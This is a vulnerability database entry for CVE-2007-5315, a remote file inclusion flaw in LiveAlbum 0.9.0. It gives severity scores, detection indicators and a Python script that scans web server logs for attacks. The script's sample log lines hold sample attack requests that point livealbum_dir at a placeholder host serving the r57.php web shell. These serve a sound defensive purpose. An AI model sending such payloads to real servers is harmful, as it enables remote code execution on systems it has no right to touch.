CVE-2007-5315
published 2007-10-09
CVE-2007-5315: PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP…
Priority P3 · 44 · medium · 6.8 CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 38.56% (98.4th percentile)
PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the livealbum_dir parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softpedia | livealbum | — | — |
Detection & IOCs (extracted from sources)
- Detect HTTP requests to common.php with a remote URL supplied in the livealbum_dir parameter, indicating an RFI exploitation attempt.
- Monitor GET/POST requests where the livealbum_dir parameter contains an http:// or https:// URL, especially those ending with a trailing '?' (null-byte/parameter injection pattern).
- Presence of r57.php in the livealbum_dir parameter value is a strong indicator of RFI shell-drop activity.
- The vulnerability is only exploitable when register_globals is enabled in the PHP configuration; installations with register_globals disabled are not affected.
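The indicators listed above can be checked against web server access logs. The following is an added example, not a rule published by this page or by any of its sources; the log lines, hosts and the function names `classify` and `scan` are constructed for illustration, and only the query string is inspected (POST bodies and cookies do not appear in a standard access log).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (common log format); addresses and hosts are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2007:13:55:36 +0000] "GET /livealbum/common.php?livealbum_dir=http://files.example/r57.php? HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2007:13:56:02 +0000] "GET /livealbum/common.php?livealbum_dir=hTTps%3A%2F%2Ffiles.example%2Fx.txt%3F HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2007:14:01:11 +0000] "GET /livealbum/index.php?album=holiday HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Oct/2007:14:01:15 +0000] "GET /livealbum/common.php?livealbum_dir=./ HTTP/1.1" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r'^\s*https?://', re.IGNORECASE)

def classify(line):
    """Return [(value, tags)] for suspicious livealbum_dir values, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith('/common.php'):
        return None
    findings = []
    # PHP variable names are case-sensitive, so the parameter name is matched exactly.
    params = parse_qs(target.query, keep_blank_values=True)
    for value in params.get('livealbum_dir', []):
        value = unquote(value)  # parse_qs decoded once; this catches double encoding
        if not REMOTE_URL_RE.match(value):
            continue
        tags = ['remote-url']
        if value.endswith('?'):
            tags.append('trailing-?')
        if 'r57.php' in value.lower():
            tags.append('r57.php')
        findings.append((value, tags))
    return findings or None

def scan(lines):
    """Return (line_number, findings) for every line that matches the indicators."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == '__main__':
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

A hit shows that a request matching the pattern was received; whether the include succeeded still depends on register_globals being enabled on that host.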
- http://osvdb.org/37618
- http://secunia.com/advisories/27139
- http://www.vupen.com/english/advisories/2007/3446
- https://exchange.xforce.ibmcloud.com/vulnerabilities/37028
- https://www.exploit-db.com/exploits/4503
Published: 2007-10-09